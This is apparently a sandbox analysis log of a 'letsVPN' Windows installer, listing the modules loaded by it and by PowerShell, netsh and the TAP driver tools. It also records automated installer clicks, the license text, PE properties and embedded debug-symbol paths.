              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: shfolder.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: kernel.appcore.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: windows.storage.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: wldp.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: profapi.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: riched20.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: usp10.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: msls31.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: textinputframework.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: coreuicomponents.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: coremessaging.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: wintypes.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: wintypes.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: wintypes.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: textshaping.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: linkinfo.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: ntshrui.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: sspicli.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: srvcli.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: cscapi.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: apphelp.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: devobj.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: devrtl.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: spinf.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: drvstore.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: devobj.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: newdev.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: cryptsp.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: rsaenh.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: cryptbase.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: gpapi.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: cabinet.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: umpnpmgr.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: devrtl.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: devrtl.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: drvstore.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: devrtl.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: drvstore.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: devobj.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netsetupsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netsetupuser.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: implatsetup.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: devrtl.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: spinf.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: drvstore.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: devobj.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappprxy.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: hnetmon.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netshell.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netsetupapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netiohlp.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshhttp.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: httpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshipsec.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: activeds.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: polstore.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winipsec.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: adsldpc.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshwfp.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cabinet.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2pnetsh.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2p.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rpcnsh.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: whhelper.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlancfg.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlanapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wshelper.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wevtapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: peerdistsh.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wcmapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rmclient.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mobilenetworking.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: slc.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: sppc.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ktmw32.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprmsg.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ifmon.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasmontr.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasman.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mfc42u.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasman.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: authfwcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpolicyiomgr.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: firewallapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\letsVPN.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
              Source: C:\Windows\System32\mmc.exe Window found: window name: msctls_updown32
              Source: C:\ProgramData\letsvpn-latest.exe Automated click: Next >
              Source: C:\ProgramData\letsvpn-latest.exe Automated click: I Agree
              Source: C:\ProgramData\letsvpn-latest.exe Automated click: Install
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\ProgramData\letsvpn-latest.exe Window detected: < &Back I &Agree Cancel Nullsoft Install System v3.10 Nullsoft Install System v3.10 License Agreement Please review the license terms before installing letsvpn. Press Page Down to see the rest of the agreement. LetsVPN Terms of Service These Terms of Service ("the Terms") govern your use of LetsVPN Services therefore we kindly ask you to carefully read them when visiting LetsVPN website before you register download install and use LetsVPN Services which include the LetsVPN software LetsVPN mobile applications and any services that LetsVPN (LetsVPN we us or our ) provides through our software application or otherwise (all of which collectively are referred as the LetsVPN Services). Please note that the Terms constitute a legally binding agreement (the Agreement) between you and LetsVPN. By visiting the website registering for installing and/or using LetsVPN Services on any platform or device you agree to be bound by these Terms. It is only under these Terms that LetsVPN allows visitors / users (the users) to use LetsVPN Services. If you do not agree to these Terms or any provisions hereof please do not install and do not use our software our mobile application and/or any of our products or services. Intellectual Property Rights The website and all of the materials contained within LetsVPN are protected by intellectual property right laws. All of the materials and content include but not limited to the graphics design scripts logos page headers images button icons appearance downloads and any other information used to promote or provide the Services. All copyright trademarks design rights patents and any other intellectual property rights (whether registered or unregistered) for the Services and all of the materials contained within our services are either owned by us licensed to us or we are entitled to use it. All such rights are reserved. The Scope of Software Licensing A. Users can install use display and run the software on PC and mobile phones (same account support different devices). B. Reserved rights: All other rights not expressly authorized are still owned by LetsVPN team. Users must obtain additional written consent from LetsVPN team when using other rights. C. Except as expressly provided in this Agreement this Agreement does not stipulate the relevant Terms of Service for LetsVPN or other services of the partner using the Software. For these services there may be separate terms of service to regulate the user. Please be aware of and confirm separately when using LetsVPN Services. If the user uses the Services it is deemed to be an acceptance of the relevant Terms of Service. User Instructions A. Users agree to obtain LetsVPN software and use LetsVPN Services from official channels; bear all losses and liabilities caused by him/herself including but not limited to: loss of account password account dispute with others etc. B. LetsVPN Account a. You understand that it is your responsibility to keep your LetsVPN account information confidentia
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: letsVPN.exe Static PE information: Image base 0x140000000 > 0x60000000
              Source: letsVPN.exe Static file information: File size 33128448 > 1048576
              Source: letsVPN.exe Static PE information: section name: RT_CURSOR
              Source: letsVPN.exe Static PE information: section name: RT_BITMAP
              Source: letsVPN.exe Static PE information: section name: RT_ICON
              Source: letsVPN.exe Static PE information: section name: RT_MENU
              Source: letsVPN.exe Static PE information: section name: RT_DIALOG
              Source: letsVPN.exe Static PE information: section name: RT_STRING
              Source: letsVPN.exe Static PE information: section name: RT_ACCELERATOR
              Source: letsVPN.exe Static PE information: section name: RT_GROUP_ICON
              Source: letsVPN.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x1ecc400
              Source: Binary string: /_/artifacts/obj/System.IO.Packaging/net461-Release/System.IO.Packaging.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2432280356.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.PerformanceCounter/net461-Release/System.Diagnostics.PerformanceCounter.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2412144630.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Configuration.ConfigurationManager/net461-windows-Release/System.Configuration.ConfigurationManager.pdbSHA256h source: letsvpn-latest.exe, 00000015.00000003.2402252974.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ObjectModel\4.0.11.0\System.ObjectModel.pdbX+r+ d+_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2457151708.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Primitives\4.0.1.0\System.Reflection.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2458361290.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\git\OSS\notifyicon-wpf\Hardcodet.NotifyIcon.Wpf\Source\NotifyIconWpf\obj\Release\Hardcodet.Wpf.TaskbarNotification.pdb source: letsvpn-latest.exe, 00000015.00000003.2351020724.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb( source: letsvpn-latest.exe, 00000015.00000003.2425718257.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NameResolution\4.0.2.0\System.Net.NameResolution.pdb source: letsvpn-latest.exe, 00000015.00000003.2449120272.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdb source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, tapinstall.exe, 00000021.00000000.2603866703.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000021.00000002.2606131178.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000023.00000000.2607796952.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000023.00000002.2660016264.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000029.00000000.2665972836.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000029.00000002.2668002400.00007FF796191000.00000020.00000001.01000000.00000017.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdb source: letsvpn-latest.exe, 00000015.00000003.2465608542.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem\4.0.3.0\System.IO.FileSystem.pdb8)R) D)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2430089756.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.Ports/net461-windows-Release/System.IO.Ports.pdbSHA256T source: letsvpn-latest.exe, 00000015.00000003.2434348436.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Net.Http\netfx\System.Net.Http.pdb source: letsvpn-latest.exe, 00000015.00000003.2444994668.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/CommunityToolkit.Mvvm/obj/Release/netstandard2.0/CommunityToolkit.Mvvm.pdb source: letsvpn-latest.exe, 00000015.00000003.2347348631.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.ResourceManager\4.0.1.0\System.Resources.ResourceManager.pdb source: letsvpn-latest.exe, 00000015.00000003.2460388898.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb* source: letsvpn-latest.exe, 00000015.00000003.2413088913.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.CodeDom/net461-Release/System.CodeDom.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2395719645.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Permissions/net461-windows-Release/System.Security.Permissions.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2482115637.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO\4.1.2.0\System.IO.pdb source: letsvpn-latest.exe, 00000015.00000003.2436159752.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Http.Facade/Release/net461/System.ServiceModel.Http.pdb source: letsvpn-latest.exe, 00000015.00000003.2485461661.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Mannelig\Dev\Projects\NET\WpfToastNotifications\Src\ToastNotifications.Messages\obj\Release\ToastNotifications.Messages.pdb source: letsvpn-latest.exe, 00000015.00000003.2510367582.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq\4.1.2.0\System.Linq.pdb source: letsvpn-latest.exe, 00000015.00000003.2438986157.0000000003103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\PowerShellStandard\src\5\obj\Release\net452\System.Management.Automation.pdb source: letsvpn-latest.exe, 00000015.00000003.2439963735.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Principal.Windows/net461-Windows_NT-Release/System.Security.Principal.Windows.pdb source: letsvpn-latest.exe, 00000015.00000003.2482765464.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Cng/net462-Windows_NT-Release/System.Security.Cryptography.Cng.pdb source: letsvpn-latest.exe, 00000015.00000003.2476891907.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Http.Facade/Release/net461/System.ServiceModel.Http.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2485461661.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Drawing.Primitives\4.0.2.0\System.Drawing.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2422275505.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Code\SVGImage\Source\SVGImage\obj\Release\net46\SVGImage.pdb4 source: letsvpn-latest.exe, 00000015.00000003.2387449334.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Data.Common/netfx\System.Data.Common.pdb source: letsvpn-latest.exe, 00000015.00000003.2404217100.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.DriveInfo\4.0.2.0\System.IO.FileSystem.DriveInfo.pdb source: letsvpn-latest.exe, 00000015.00000003.2427925785.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Drawing.Common/net461-Release/System.Drawing.Common.pdb source: letsvpn-latest.exe, 00000015.00000003.2421605703.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Principal.Windows/net461-Windows_NT-Release/System.Security.Principal.Windows.pdbSHA256zqXL source: letsvpn-latest.exe, 00000015.00000003.2482765464.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\ipnetwork\src\System.Net.IPNetwork\obj\release\net46\System.Net.IPNetwork.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2448378119.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: WebView2Loader.dll.pdb source: letsvpn-latest.exe, 00000015.00000003.2548790969.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2549736766.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2532359681.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Writer\4.0.2.0\System.Resources.Writer.pdb source: letsvpn-latest.exe, 00000015.00000003.2461540941.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\Utils\obj\Release\Utils.pdb} source: letsvpn-latest.exe, 00000015.00000003.2511835079.0000000003107000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000002.2707489755.0000000002AE2000.00000002.00000001.01000000.0000001B.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.FileSystem.AccessControl/net461-Windows_NT-Release/System.IO.FileSystem.AccessControl.pdb source: letsvpn-latest.exe, 00000015.00000003.2427249468.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Syndication/net461-Release/System.ServiceModel.Syndication.pdb source: letsvpn-latest.exe, 00000015.00000003.2488139644.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\obj\Release\net40\Mono.Cecil.pdbSHA256) source: letsvpn-latest.exe, 00000015.00000003.2379243714.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensionsAsync\obj\Release\netstandard1.1\SQLiteNetExtensionsAsync.pdbSHA2562` source: letsvpn-latest.exe, 00000015.00000003.2383763587.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\winsign\samuli\source\repos\tap-windows6\src\x64\Release\tap0901.pdb source: letsvpn-latest.exe, 00000015.00000003.2342568479.0000000003106000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000026.00000003.2627038541.000001CC02F6C000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000027.00000003.2646713593.000001FA98EA4000.00000004.00000020.00020000.00000000.sdmp
